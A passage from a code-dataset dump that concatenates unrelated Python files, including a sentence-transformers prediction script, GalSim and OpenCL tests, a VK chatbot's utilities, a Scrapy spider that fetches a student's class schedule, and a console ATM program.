ttk.Button(\n self,\n text=\"Add Class:\",\n command=lambda: self.classes_window.add_class(webcam_section_frame)\n )\n add_button.grid(row=1, column=0, padx=5, pady=5)\n","sub_path":"main_content_frames/data_section_frames/classes_section/classesSectionFrame.py","file_name":"classesSectionFrame.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"628746812","text":"import argparse\n\nfrom collections import defaultdict\nfrom typing import Union\nfrom sentence_transformers import CrossEncoder\nfrom pathlib import Path\n\nfrom run_eval_sent_transformer import read_examples\n\n\ndef predict_sent_transformer(\n model: Union[str, CrossEncoder],\n input_file: Path,\n output_file: Path,\n batch_size: int,\n lower_case: bool\n):\n if type(model) == str:\n model = CrossEncoder(model)\n\n examples = read_examples(input_file, lower_case)\n input_texts = [example.texts for example in examples]\n\n scores = model.predict(input_texts, batch_size)\n\n # Get example with highest score per id\n best_scores = defaultdict(lambda: -1)\n best_instances = {}\n\n for example, score in zip(examples, scores):\n if score > best_scores[example.guid]:\n best_scores[example.guid] = score\n best_instances[example.guid] = example\n\n # Write final prediction\n writer = output_file.open(\"w\", encoding=\"utf8\")\n for id in sorted(best_instances.keys()):\n best_example = best_instances[id]\n writer.write(best_example.texts[1] + \"\\n\")\n writer.flush()\n\n writer.close()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--model\", type=str, required=True)\n parser.add_argument(\"--input_file\", type=Path, required=True)\n parser.add_argument(\"--output_file\", type=Path, required=True)\n parser.add_argument(\"--bs\", type=int, default=8, required=False)\n parser.add_argument(\"--cased\", default=False, required=False, action=\"store_true\")\n\n args = parser.parse_args()\n\n predict_sent_transformer(\n model=args.model,\n input_file=args.input_file,\n output_file=args.output_file,\n batch_size=args.bs,\n lower_case=not args.cased\n )\n","sub_path":"predict_sent_transformer.py","file_name":"predict_sent_transformer.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"39584736","text":"from django.conf.urls import patterns, include, url\n\n\nurlpatterns = patterns(\"kiqlist.notifications.views\",\n\turl(r\"new/$\", \"new\"),\n\turl(r\"delete/$\", \"delete\"),\n\turl(r\"read/(?P\\d+)/$\", \"read\"),\n\turl(r\"all/$\", \"all\"),\n\turl(r\"mark_old$\", \"mark_as_old\")\n)\n","sub_path":"kiqlist/kiqlist/notifications/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"349916","text":"from dask.distributed import Client\nclient = Client(scheduler_file='scheduler.json')\n\nimport socket\nhost = client.run_on_scheduler(socket.gethostname)\n\ndef start_jlab(dask_scheduler):\n import subprocess\n proc = subprocess.Popen(['jupyter', 'lab', '--ip', host, '--no-browser'])\n dask_scheduler.jlab_proc = proc\n\nclient.run_on_scheduler(start_jlab)\n\nprint(\"ssh -N -L 8787:%s:8787 -L 8888:%s:8888 cheyenne.ucar.edu\" % (host, host))\n","sub_path":"setup-jlab.py","file_name":"setup-jlab.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"463944971","text":"# Copyright (c) 2012-2019 by the GalSim developers team on GitHub\n# https://github.com/GalSim-developers\n#\n# This file is part of GalSim: The modular galaxy image simulation toolkit.\n# https://github.com/GalSim-developers/GalSim\n#\n# GalSim is free software: redistribution and use in source and binary forms,\n# with or without modification, are permitted provided that the following\n# conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice, this\n# list of conditions, and the disclaimer given in the accompanying LICENSE\n# file.\n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions, and the disclaimer given in the documentation\n# and/or other materials provided with the distribution.\n#\n\nfrom __future__ import print_function\nimport os\nimport sys\nimport numpy as np\n\nimport galsim\nfrom galsim_test_helpers import *\n\n\ndef check_dep(f, *args, **kwargs):\n \"\"\"Check that some function raises a GalSimDeprecationWarning as a warning, but not an error.\n \"\"\"\n # Check that f() raises a warning, but not an error.\n with assert_warns(galsim.GalSimDeprecationWarning):\n res = f(*args, **kwargs)\n return res\n\n\n@timer\ndef test_gsparams():\n check_dep(galsim.GSParams, allowed_flux_variation=0.90)\n check_dep(galsim.GSParams, range_division_for_extrema=50)\n check_dep(galsim.GSParams, small_fraction_of_flux=1.e-6)\n\n\n@timer\ndef test_phase_psf():\n atm = galsim.Atmosphere(screen_size=10.0, altitude=0, r0_500=0.15, suppress_warning=True)\n psf = atm.makePSF(exptime=0.02, time_step=0.01, diam=1.1, lam=1000.0)\n check_dep(galsim.PhaseScreenPSF.__getattribute__, psf, \"img\")\n check_dep(galsim.PhaseScreenPSF.__getattribute__, psf, \"finalized\")\n\n@timer\ndef test_interpolant():\n d = check_dep(galsim.Delta, tol=1.e-2)\n assert d.gsparams.kvalue_accuracy == 1.e-2\n assert check_dep(getattr, d, 'tol') == d.gsparams.kvalue_accuracy\n n = check_dep(galsim.Nearest, tol=1.e-2)\n assert n.gsparams.kvalue_accuracy == 1.e-2\n assert check_dep(getattr, n, 'tol') == n.gsparams.kvalue_accuracy\n s = check_dep(galsim.SincInterpolant, tol=1.e-2)\n assert s.gsparams.kvalue_accuracy == 1.e-2\n assert check_dep(getattr, s, 'tol') == s.gsparams.kvalue_accuracy\n l = check_dep(galsim.Linear, tol=1.e-2)\n assert l.gsparams.kvalue_accuracy == 1.e-2\n assert check_dep(getattr, l, 'tol') == l.gsparams.kvalue_accuracy\n c = check_dep(galsim.Cubic, tol=1.e-2)\n assert c.gsparams.kvalue_accuracy == 1.e-2\n assert check_dep(getattr, c, 'tol') == c.gsparams.kvalue_accuracy\n q = check_dep(galsim.Quintic, tol=1.e-2)\n assert q.gsparams.kvalue_accuracy == 1.e-2\n assert check_dep(getattr, q, 'tol') == q.gsparams.kvalue_accuracy\n l3 = check_dep(galsim.Lanczos, 3, tol=1.e-2)\n assert l3.gsparams.kvalue_accuracy == 1.e-2\n assert check_dep(getattr, l3, 'tol') == l3.gsparams.kvalue_accuracy\n ldc = check_dep(galsim.Lanczos, 3, False, tol=1.e-2)\n assert ldc.gsparams.kvalue_accuracy == 1.e-2\n assert check_dep(getattr, ldc, 'tol') == ldc.gsparams.kvalue_accuracy\n l8 = check_dep(galsim.Lanczos, 8, tol=1.e-2)\n assert l8.gsparams.kvalue_accuracy == 1.e-2\n assert check_dep(getattr, l8, 'tol') == l8.gsparams.kvalue_accuracy\n l11 = check_dep(galsim.Interpolant.from_name, 'lanczos11', tol=1.e-2)\n assert l11.gsparams.kvalue_accuracy == 1.e-2\n assert check_dep(getattr, l11, 'tol') == l11.gsparams.kvalue_accuracy\n\n@timer\ndef test_noise():\n real_gal_dir = os.path.join('..','examples','data')\n real_gal_cat = 'real_galaxy_catalog_23.5_example.fits'\n real_cat = galsim.RealGalaxyCatalog(\n dir=real_gal_dir, file_name=real_gal_cat, preload=True)\n\n test_seed=987654\n test_index = 17\n cf_1 = real_cat.getNoise(test_index, rng=galsim.BaseDeviate(test_seed))\n im_2, pix_scale_2, var_2 = real_cat.getNoiseProperties(test_index)\n # Check the variance:\n var_1 = cf_1.getVariance()\n assert var_1==var_2,'Inconsistent noise variance from getNoise and getNoiseProperties'\n # Check the image:\n ii = galsim.InterpolatedImage(im_2, normalization='sb', calculate_stepk=False,\n calculate_maxk=False, x_interpolant='linear')\n cf_2 = check_dep(galsim.correlatednoise._BaseCorrelatedNoise,\n galsim.BaseDeviate(test_seed), ii, im_2.wcs)\n cf_2 = cf_2.withVariance(var_2)\n assert cf_1==cf_2,'Inconsistent noise properties from getNoise and getNoiseProperties'\n\nif __name__ == \"__main__\":\n test_gsparams()\n test_phase_psf()\n test_interpolant()\n test_noise()\n","sub_path":"tests/test_deprecated.py","file_name":"test_deprecated.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"592047027","text":"import json\nimport os\nimport re\n\nimport datetime\n\nimport copy\nimport requests\n\nimport utils.vklib as vk\nimport utils.db_utils as db\nimport model as m\nimport consts as cnst\nimport config as cfg\n\n\ndef make_subs_file(uid):\n bot_followers = db.get_bot_followers()\n if len(bot_followers) == 0:\n text = 'В боте ещё нет подписчиков'\n vk.send_message(uid, text)\n return 'ok'\n filename = 'subs.csv'\n out = open(filename, 'a')\n text = 'ID; Имя; Статус; Подписан на рассылку\\n'\n out.write(text)\n for x in bot_followers:\n text = '{};{};{};{}\\n'.format(x.uid, x.name, x.status, x.mess_allowed)\n out.write(text)\n out.close()\n res = vk.get_doc_upload_server1(uid)\n print(res)\n upload_url = res['response']['upload_url']\n files = {'file': open(filename, 'r')}\n response = requests.post(upload_url, files=files)\n result = response.json()\n print(result)\n r = vk.save_doc(result['file'])\n vk_doc_link = 'doc{!s}_{!s}'.format(r['response'][0]['owner_id'], r['response'][0]['id'])\n print(vk_doc_link)\n os.remove(filename)\n return vk_doc_link\n\n\ndef get_group_count(group_id=cfg.group_id):\n members_count = vk.get_count_group_followers(group_id)\n return int(members_count)\n\n\ndef parse_group(members_count, group_id=cfg.group_id):\n follower_list = db.get_bot_followers(only_id=True)\n iterations = members_count // 1000 + 1\n users_added = 0\n for x in range(iterations):\n users = vk.get_group_memebers(group_id, offset=x * 1000, count=1000)\n for user_id in users:\n try:\n if not user_id in follower_list:\n username = vk.get_user_name(user_id)\n msg_allowed = 0\n if vk.is_messages_allowed(user_id):\n msg_allowed = 1\n db.add_bot_follower(user_id, username, msg_allowed=msg_allowed)\n users_added += 1\n except Exception as e:\n pass\n return users_added\n\n\ndef del_uid_from_dict(uid, dict_):\n if uid in dict_:\n del dict_[uid]\n\n\ndef send_message_admins(info):\n admins = db.get_list_bot_admins()\n vk.send_message_much(admins, cnst.NOTIFY_ADMIN.format(info.uid, info.name, info.email, info.number))\n\n\ndef send_message_admins_after_restart():\n admins = db.get_list_bot_admins()\n vk.send_message_much_keyboard(admins, cnst.MSG_SERVER_RESTARTED, create_keyboard_by_quiz())\n\n\ndef is_number_valid(number):\n match = re.fullmatch('^((8|\\+7)[\\- ]?)?(\\(?\\d{3}\\)?[\\- ]?)?[\\d\\- ]{7,9}', number)\n if match:\n return True\n else:\n return False\n\n\ndef is_email_valid(email):\n match = re.fullmatch('[\\w.-]+@\\w+\\.\\w+', email)\n if match:\n return True\n else:\n return False\n\n\ndef new_user_or_not(uid, uname):\n e = db.is_known_user(uid)\n if e or db.is_admin(uid):\n if e:\n db.set_bot_follower_mess_allowed(uid, 1)\n else:\n db.add_bot_follower(uid, uname, status=cnst.USER_NOT_SUB_STATUS, msg_allowed=1)\n vk.send_message_keyboard(uid, cnst.MSG_WELCOME.format(uname), cnst.KEYBOARD_USER)\n\n\ndef get_keyboard_from_list(list):\n keyboard = copy.deepcopy(cnst.keyboard_pattern.copy())\n c = 0\n for i in list:\n if c == 7:\n break\n one_btns = copy.deepcopy(cnst.one_button_pattern)\n one_btns[0]['action']['label'] = i\n j = {\"button\": 'K'}\n one_btns[0]['action']['payload'] = json.dumps(j)\n keyboard['buttons'].append(one_btns)\n c += 1\n # keyboard['buttons'].append(cnst.enroll_btn)\n return keyboard\n\n\ndef create_keyboard_by_quiz(for_admin=False):\n quiz = db.get_all_quiz()\n keyboard = copy.deepcopy(cnst.keyboard_pattern.copy())\n two_btns = copy.deepcopy(cnst.two_buttons_pattern)\n i = 1\n for c in quiz:\n if i == 1:\n two_btns = copy.deepcopy(cnst.two_buttons_pattern)\n two_btns[0]['action']['label'] = c.title\n j = {\"button\": 'K' + str(c.id)}\n two_btns[0]['action']['payload'] = json.dumps(j)\n i += 1\n else:\n two_btns[1]['action']['label'] = c.title\n j = {\"button\": 'K' + str(c.id)}\n two_btns[1]['action']['payload'] = json.dumps(j)\n keyboard['buttons'].append(two_btns.copy())\n i = 1\n if i == 2:\n if for_admin:\n two_btns[1]['action']['label'] = 'НАЗАД'\n else:\n one_btn = copy.deepcopy(cnst.one_button_pattern)\n one_btn[0]['action']['label'] = two_btns[0]['action']['label']\n two_btns = one_btn\n keyboard['buttons'].append(two_btns)\n elif for_admin:\n one_btn = copy.deepcopy(cnst.one_button_pattern)\n one_btn[0]['action']['label'] = 'НАЗАД'\n keyboard['buttons'].append(one_btn)\n return keyboard\n\n\ndef send_questions(uid, quiz):\n questions = db.get_questions_by_quiz(quiz)\n msg = 'Вопросы: \\n\\n'\n for q in questions:\n msg += '(ID-' + str(q.id) + ') '\n msg += q.qtext + '\\n'\n msg += q.answers + '\\n'\n msg += 'ОТВЕТ: ' + q.true_ans + '\\n'\n msg += q.photo_url + '\\n'\n msg += q.video_url + '\\n'\n msg += q.link_url + '\\n------------\\n\\n'\n vk.send_message(uid, msg)\n\n\ndef back_to_quiz_list(uid):\n keyboard = create_keyboard_by_quiz(for_admin=True)\n vk.send_message_keyboard(uid, 'Опросы', keyboard)\n\n\ndef send_question(uid, q):\n msg = '-----------------\\n' + q.qtext\n keyboard = get_keyboard_from_list(q.answers.split(', '))\n vk.send_message_keyboard(uid, msg, keyboard)\n if q.have_photo():\n vk.send_message_with_attach(uid, 'Фото:', q.photo_url)\n if q.have_video():\n vk.send_message_with_attach(uid, \"Видео:\", q.video_url)\n if q.have_link():\n print('_______________________---' + q.link_url)\n vk.send_message(uid, 'Ссылка: ' + q.link_url)\n\n\ndef get_mark(quiz, true_ans_count):\n marks_str = db.get_mark_by_quiz(quiz)\n marks_arr = marks_str.split('|')[:-1]\n for marr in marks_arr:\n mcrit = marr.split(' ')[0]\n min = int(mcrit.split('-')[0])\n max = int(mcrit.split('-')[1])\n mtext = marr.split(' ')[1]\n if true_ans_count >= min and true_ans_count <= max:\n return mtext\n return 'Нет оценки для этого результата'\n\n\ndef get_keyboard_true_ans(answers, true_ans, text):\n answers += ', {}'.format(cnst.BTN_NEXT)\n keyboard = get_keyboard_from_list(answers.split(', '))\n for btn in keyboard['buttons']:\n if btn[0]['action']['label'] == text:\n btn[0][\"color\"] = 'negative'\n if btn[0]['action']['label'] == true_ans:\n btn[0][\"color\"] = 'positive'\n if btn[0]['action']['label'] == cnst.BTN_NEXT:\n btn[0][\"color\"] = 'primary'\n return keyboard\n\n\ndef increase_last_mark_if_need(quiz):\n quest_count = len(db.get_questions_by_quiz(quiz))\n marks_str = db.get_mark_by_quiz(quiz)\n marks_arr = marks_str.split('|')[:-1]\n new_str_mark = ''\n i = 0\n for marr in marks_arr:\n new_str_mark = marr + '|'\n if i == len(marks_arr) - 1:\n mcrit = marr.split(' ')[0]\n min = int(mcrit.split('-')[0])\n max = int(mcrit.split('-')[1])\n if max > quest_count:\n return\n max += 1\n mtext = marr.split(' ')[1]\n new_last_mark = '{}-{} {}'.format(min, max, mtext)\n new_str_mark = new_last_mark + '|'\n i += 1\n db.delete_mark(quiz)\n db.add_new_mark(quiz, new_str_mark)\n\n\ndef isint(s):\n try:\n int(s)\n return True\n except ValueError:\n return False\n","sub_path":"utils/service_utils.py","file_name":"service_utils.py","file_ext":"py","file_size_in_byte":7765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"286318422","text":"# -*- coding: utf-8 -*-\r\nimport scrapy\r\nfrom scrapy.http import Request,FormRequest\r\nimport json\r\nfrom ..items import classScheduleItem,userItem\r\nfrom warehouse.models import user\r\nclass PachSpider(scrapy.Spider): #定义爬虫类,必须继承scrapy.Spider\r\n name = 'urplogin' #设置爬虫名称\r\n allowed_domains = ['zhjw.scu.edu.cn'] #爬取域名\r\n # start_urls = ['http://edu.iqianyue.com/index_user_login.html'] #爬取网址,只适于不需要登录的请求,因为没法设置cookie等信息\r\n header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'} #设置浏览器用户代理\r\n logindata = {'j_username': '0', 'j_password': '0', 'j_captcha1': 'error'}\r\n usermsg = userItem()\r\n\r\n def __init__(self, logindata=None, *args, **kwargs):\r\n super(PachSpider, self).__init__(*args, **kwargs)\r\n self.logindata = json.loads(logindata)\r\n def start_requests(self): #用start_requests()方法,代替start_urls\r\n \"\"\"第一次请求一下登录页面,设置开启cookie使其得到cookie,设置回调函数\"\"\"\r\n\r\n self.usermsg['userID'] = str(self.logindata['j_username'])\r\n self.usermsg['userName'] = \"\"\r\n self.usermsg['userPassword']=str(self.logindata['j_password'])\r\n self.usermsg.save()\r\n return [Request('http://zhjw.scu.edu.cn/login',meta={'cookiejar':1},callback=self.parse)]\r\n\r\n def parse(self, response): #parse回调函数\r\n # 响应Cookie\r\n Cookie1 = response.headers.getlist('Set-Cookie') #查看一下响应Cookie,也就是第一次访问注册页面时后台写入浏览器的Cookie\r\n print(Cookie1)\r\n print('登录中')\r\n \"\"\"第二次用表单post请求,携带Cookie、浏览器代理、用户登录信息,进行登录给Cookie授权\"\"\"\r\n return [FormRequest.from_response(response,\r\n url='http://zhjw.scu.edu.cn/j_spring_security_check', #真实post地址\r\n meta={'cookiejar':response.meta['cookiejar']},\r\n headers=self.header,\r\n formdata=self.logindata,\r\n callback=self.next,\r\n )]\r\n def next(self,response):\r\n a = response.body.decode(\"utf-8\") #登录后可以查看一下登录响应信息\r\n \"\"\"登录后请求需要登录才能查看的页面,如个人中心,携带授权后的Cookie请求\"\"\"\r\n yield Request('http://zhjw.scu.edu.cn/student/courseSelect/thisSemesterCurriculum/ajaxStudentSchedule/callback',meta={'cookiejar':True},callback=self.next2)\r\n def next2(self,response):\r\n # 请求Cookie\r\n Cookie2 = response.request.headers.getlist('Cookie')\r\n print(Cookie2)\r\n rs=json.loads(response.body)\r\n allmsg=rs['xkxx'][0]\r\n for key in allmsg:\r\n for sameclass in allmsg[key]['timeAndPlaceList']:\r\n classSchedule = classScheduleItem()\r\n classSchedule['userID'] = user.objects.get(userID=self.usermsg['userID'])\r\n classSchedule['attendClassTeacher'] = allmsg[key]['attendClassTeacher']\r\n classSchedule['courseName'] = allmsg[key]['courseName']\r\n classSchedule['classroomName'] = sameclass['campusName']+sameclass['teachingBuildingName']+sameclass['classroomName']\r\n classSchedule['weekDescription']= sameclass['weekDescription']\r\n classSchedule['classDay'] = sameclass['classDay']\r\n classSchedule['classSessions'] = sameclass['classSessions']\r\n classSchedule['continuingSession'] = sameclass['continuingSession']\r\n yield classSchedule\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"crawler/urpspider/build/lib/urpspider/spiders/urplogin.py","file_name":"urplogin.py","file_ext":"py","file_size_in_byte":3932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"2243859","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nfrom Atm.core import auth\nfrom Atm.core import transaction\nimport os\npath = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n#存于内存当中的帐户数据\nuser_data = {'account_id':None,'is_authenticated':False,'account_data':None} #初始无用户名,无验证,无数据\n\n@auth.login_acc\ndef account_info(acc_data):\n print('''用 户:%s\n信用额度:\\033[031;1m%s\\033[0m\n余 额:\\033[031;1m%s\\033[0m'''%(acc_data['account_data']['id'],acc_data['account_data']['credit'],acc_data['account_data']['balance']))\n\n@auth.login_acc\ndef repay(acc_data):\n '''\n 还款\n :param acc_data: 即是user_data\n :return:\n '''\n print(\"---当前的帐户余额为\\033[031;1m%s\\033[0m---\"%acc_data['account_data']['balance'])\n flag = True\n while flag:\n amount = input(\"请输入还款金额或按b返回:\")\n if amount.isdigit() and len(amount)>0:\n amount = int(amount)\n print(\"还款\\033[031;1m%s\\033[0m\"%amount)\n transaction.transaction(acc_data,'repay',amount)\n elif amount == 'b':\n flag = False\n else:\n print(\"输入错误\")\n\n@auth.login_acc\ndef withdraw(acc_data):\n '''\n 取款\n :param acc_data: 即是user_data\n :return:\n '''\n print(\"---当前的帐户余额为\\033[031;1m%s\\033[0m---\"%acc_data['account_data']['balance'])\n flag = True\n while flag:\n amount = input(\"请输入取款金额或按b返回:\")\n if amount.isdigit() and len(amount)>0:\n amount = int(amount)\n print(\"取款\\033[031;1m%s\\033[0m\"%amount)\n transaction.transaction(acc_data,'withdraw',amount)\n elif amount == 'b':\n flag = False\n else:\n print(\"输入错误\")\n\n@auth.login_acc\ndef transfer(acc_data):\n user = input(\"请��入要转入的账户:\")\n user_file = \"%s/db/%s.json\"%(path,user)\n if os.path.isfile(user_file):\n flag = True\n while flag:\n amount = input(\"请输入金额:\")\n if amount.isdigit() and len(amount)>0:\n amount = int(amount)\n print(\"向%s转账\\033[031;1m%s\\033[0m\"%(user,amount))\n transaction.transaction(acc_data,'transfer',amount,user)\n flag = False\n elif amount == 'b':\n flag = False\n else:\n print(\"输入错误\")\n return\n else:\n print(\"所转的账户不存在\")\n\n@auth.login_acc\ndef pay_check(acc_data):\n user_file = \"%s/log/%s.log\"%(path,acc_data['account_id'])\n with open(user_file,'r')as f :\n print(f.read())\n\n@auth.login_acc\ndef logout(acc_data):\n exit()\n\n@auth.login_acc\ndef interactive(acc_data):\n '''\n 交互选择\n :param acc_data: 文件中用户保存的数据\n :return:\n '''\n menu_dict = {'1': account_info,\n '2': repay,\n '3': withdraw,\n '4': transfer,\n '5': pay_check,\n '6': logout}\n menu = \"1. 账户信息\\n2. 还款\\n3. 取款\\n4. 转账\\n5. 账单\\n6. 退出\"\n while True:\n print(menu)\n choise = input(\"请选择所需的操作:\")\n if choise in menu_dict:\n menu_dict[choise](acc_data)\n else:\n print(\"\\033[031;1m选择不存在,请重新输入\\033[0m\")\n\ndef run():\n '''\n 开始启动程序即调用此函数\n :return:\n '''\n acc_data = auth.user_login(user_data) #用于判断用户是否登陆的数据\n if user_data['is_authenticated']: #如果用户已经登陆,is_authenticated的值为True\n user_data['account_data'] = acc_data #将登陆的用户数据存入内存中的变量\n interactive(user_data)","sub_path":"Atm/core/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"549634917","text":"\"\"\"Tests for the OpenCL kernels.\"\"\"\nfrom .conftest import context_available\nfrom ..cl import kernel_source, get_context, pad\nfrom ..cl.utilities import DOUBLE_FP_SUPPORT\nimport numpy as np\nfrom peridynamics.neighbour_list import create_neighbour_list\nimport pyopencl as cl\nfrom pyopencl import mem_flags as mf\nimport pytest\n\n\ndef test_get_context():\n \"\"\"Test the get_context function.\"\"\"\n context = get_context()\n\n if type(context) == cl._cl.Context:\n devices = context.devices\n assert len(devices) == 1\n assert (devices[0].get_info(cl.device_info.DOUBLE_FP_CONFIG)\n & DOUBLE_FP_SUPPORT)\n else:\n assert context is None\n\n\nclass TestPad():\n \"\"\"Test padding helper function.\"\"\"\n\n def test_pad_1d(self):\n \"\"\"Test padding for a 1D array.\"\"\"\n dimension = 258\n group_size = 256\n expected_dimension = 512\n\n array = np.random.random(dimension)\n array = pad(array, group_size)\n\n assert array.shape == (expected_dimension,)\n assert np.all(\n array[dimension:] == np.zeros(expected_dimension-dimension)\n )\n\n def test_no_padding(self):\n \"\"\"Test padding when non is required.\"\"\"\n dimension = 512\n group_size = 256\n expected_dimension = 512\n\n array = np.random.random(dimension)\n array = pad(array, group_size)\n\n assert array.shape == (expected_dimension,)\n assert np.all(\n array[dimension:] == np.zeros(expected_dimension-dimension)\n )\n\n def test_pad_2d_axis0(self):\n \"\"\"Test padding a 2D array along axis 0.\"\"\"\n dimension = 755\n other_dimension = 5\n group_size = 256\n expected_dimension = 768\n\n array = np.random.random((dimension, other_dimension))\n array = pad(array, group_size)\n\n assert array.shape == ((expected_dimension, other_dimension,))\n assert np.all(\n array[dimension:, :] ==\n np.zeros((expected_dimension-dimension, other_dimension))\n )\n\n def test_pad_2d_axis1(self):\n \"\"\"Test padding a 2D array along axis 1.\"\"\"\n dimension = 400\n other_dimension = 17\n group_size = 256\n expected_dimension = 512\n\n array = np.random.random((other_dimension, dimension))\n array = pad(array, group_size, axis=1)\n\n assert array.shape == ((other_dimension, expected_dimension, ))\n assert np.all(\n array[:, dimension:] ==\n np.zeros((other_dimension, expected_dimension-dimension))\n )\n\n\n@pytest.fixture(scope=\"module\")\ndef context():\n \"\"\"Create a context using the default platform, prefer GPU.\"\"\"\n return get_context()\n\n\n@context_available\n@pytest.fixture(scope=\"module\")\ndef queue(context):\n \"\"\"Create a CL command queue.\"\"\"\n return cl.CommandQueue(context)\n\n\n@context_available\n@pytest.fixture(scope=\"module\")\ndef program(context):\n \"\"\"Create a program object from the kernel source.\"\"\"\n return cl.Program(context, kernel_source).build()\n\n\n@context_available\ndef test_damage(context, queue, program):\n \"\"\"Test damage kernel.\"\"\"\n n_neigh = np.array([5, 5, 3, 0, 4, 5, 8, 3, 2, 1], dtype=np.int32)\n family = np.array([10, 5, 5, 1, 5, 7, 10, 3, 3, 4], dtype=np.int32)\n damage = np.empty(n_neigh.shape, dtype=np.float64)\n\n # Create buffers\n n_neigh_d = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR,\n hostbuf=n_neigh)\n family_d = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR,\n hostbuf=family)\n damage_d = cl.Buffer(context, mf.WRITE_ONLY, damage.nbytes)\n\n # Call kernel\n damage_kernel = program.damage\n damage_kernel(queue, family.shape, None, n_neigh_d, family_d, damage_d)\n cl.enqueue_copy(queue, damage, damage_d)\n\n damage_expected = (family - n_neigh) / family\n assert np.allclose(damage, damage_expected)\n\n\nclass TestForce():\n \"\"\"Test force calculation.\"\"\"\n\n @context_available\n def test_initial_force(self, context, queue, program):\n \"\"\"Ensure forces are zero when there is no displacement.\"\"\"\n r0 = np.array([\n [0.0, 0.0, 0.0],\n [1.0, 0.0, 0.0],\n [0.0, 1.0, 0.0],\n [2.0, 0.0, 0.0],\n [0.0, 0.0, 1.0],\n ], dtype=np.float64)\n horizon = 1.1\n volume = np.ones(5, dtype=np.float64)\n bond_stiffness = 1.0\n max_neigh = 3\n nlist, n_neigh = create_neighbour_list(r0, horizon, max_neigh)\n\n force_expected = np.zeros((5, 3), dtype=np.float64)\n force_actual = np.empty_like(force_expected)\n\n # Create buffers\n r_d = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR,\n hostbuf=r0)\n r0_d = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR,\n hostbuf=r0)\n nlist_d = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR,\n hostbuf=nlist)\n n_neigh_d = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR,\n hostbuf=n_neigh)\n volume_d = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR,\n hostbuf=volume)\n force_d = cl.Buffer(context, mf.WRITE_ONLY, force_expected.nbytes)\n\n # Call kernel\n bond_force = program.bond_force\n bond_force(queue, n_neigh.shape, None, r_d, r0_d, nlist_d, n_neigh_d,\n np.int32(max_neigh), volume_d, np.float64(bond_stiffness),\n force_d)\n cl.enqueue_copy(queue, force_actual, force_d)\n\n assert np.allclose(force_actual, force_expected)\n\n @context_available\n def test_force(self, context, queue, program):\n \"\"\"Ensure forces are in the correct direction using a minimal model.\"\"\"\n r0 = np.array([\n [0.0, 0.0, 0.0],\n [1.0, 0.0, 0.0],\n [1.0, 1.0, 0.0],\n ], dtype=np.float64)\n horizon = 1.01\n elastic_modulus = 0.05\n bond_stiffness = 18.0 * elastic_modulus / (np.pi * horizon**4)\n max_neigh = 3\n volume = np.full(3, 0.16666667, dtype=np.float64)\n nlist, n_neigh = create_neighbour_list(r0, horizon, max_neigh)\n\n # Displace particles, but do not update neighbour list\n r = r0 + np.array([\n [0.0, 0.0, 0.0],\n [0.05, 0.0, 0.0],\n [0.05, 0.05, 0.0]\n ], dtype=np.float64)\n\n force_value = 0.00229417\n force_expected = np.array([\n [force_value, 0., 0.],\n [-force_value, force_value, 0.],\n [0., -force_value, 0.]\n ])\n force_actual = np.empty_like(force_expected)\n\n # Create buffers\n r_d = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR,\n hostbuf=r)\n r0_d = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR,\n hostbuf=r0)\n nlist_d = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR,\n hostbuf=nlist)\n n_neigh_d = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR,\n hostbuf=n_neigh)\n volume_d = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR,\n hostbuf=volume)\n force_d = cl.Buffer(context, mf.WRITE_ONLY, force_expected.nbytes)\n\n # Call kernel\n bond_force = program.bond_force\n bond_force(queue, n_neigh.shape, None, r_d, r0_d, nlist_d, n_neigh_d,\n np.int32(max_neigh), volume_d, np.float64(bond_stiffness),\n force_d)\n cl.enqueue_copy(queue, force_actual, force_d)\n\n assert np.allclose(force_actual, force_expected)\n\n\n@context_available\ndef test_break_bonds(context, queue, program):\n \"\"\"Test neighbour list function.\"\"\"\n r0 = np.array([\n [0.0, 0.0, 0.0],\n [1.0, 0.0, 0.0],\n [0.0, 1.0, 0.0],\n [2.0, 0.0, 0.0],\n [0.0, 0.0, 1.0],\n ])\n horizon = 1.1\n max_neigh = 3\n nl, n_neigh = create_neighbour_list(r0, horizon, max_neigh)\n\n nl_expected = np.array([\n [1, 2, 4],\n [0, 3, 0],\n [0, 0, 0],\n [1, 0, 0],\n [0, 0, 0]\n ])\n n_neigh_expected = np.array([3, 2, 1, 1, 1])\n\n assert np.all(nl == nl_expected)\n assert 